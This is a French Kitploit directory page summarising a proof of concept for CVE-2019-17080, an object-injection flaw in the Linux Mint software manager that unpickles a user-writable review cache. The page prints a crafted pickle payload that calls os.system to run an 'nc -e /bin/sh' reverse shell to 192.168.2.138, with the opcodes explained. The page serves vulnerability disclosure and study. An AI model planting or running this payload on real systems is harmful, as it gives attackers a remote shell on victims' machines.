Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Mintinstall-object-injection — CVE-2019-17080 | Kitploit
Outils/GitHubGitHub/andhrimnirr/mintinstall-object-injection
Payload GenerationVulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationMisconfiguration
GitHubandhrimnirr/mintinstall-object-injection

Mintinstall-object-injection

CVE-2019-17080

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1il y a 6 ansPas encore vérifié

Gestionnaire de logiciels Linux Mint (v 7.9.5/9) – en raison d'une configuration incorrecte, cela provoque une injection d'objet et l'exécution de code arbitraire.

root@kitploit:~
mintinstall

Lorsque vous lancez le gestionnaire de logiciels Mint, il vérifie la présence de nouveaux commentaires ; s'il y en a, il les télécharge depuis new-reviews.list et les écrit dans un fichier.

root@kitploit:~
code mintinstall.py

Au démarrage du gestionnaire de logiciels, il appelle la classe ReviewCache() du module des avis.

Comment traite-t-il les données ?

root@kitploit:~
code reviews.py

Lorsque la classe ReviewCache démarre (init), elle appelle la fonction _load_cache().

La fonction Load cache lit le fichier contenu dans la variable REVIEWS_CACHE, désérialise les données du fichier à l'aide du module pickle et stocke certaines valeurs en mémoire.

En vérifiant le fichier, je constate que j'ai les droits d'écriture.

Grâce au module Pickle, nous pouvons effectuer des opérations de sérialisation/désérialisation. En utilisant la méthode reduce, nous pouvons inclure un module et exécuter du code arbitraire.

Dans ce cas, si le fichier est désérialisé, notre code malveillant s'exécutera.

root@kitploit:~
cos 
system 
(S'nc -e /bin/sh 192.168.2.138 4545' 
tR.
>>nom du module : os
>> fonction
( >> objet marqueur
S >> lire jusqu'à la fin de la chaîne et empiler
tR. >> appeler les éléments de la pile et placer le résultat sur la pile.

alt-text

Télécharger l’outil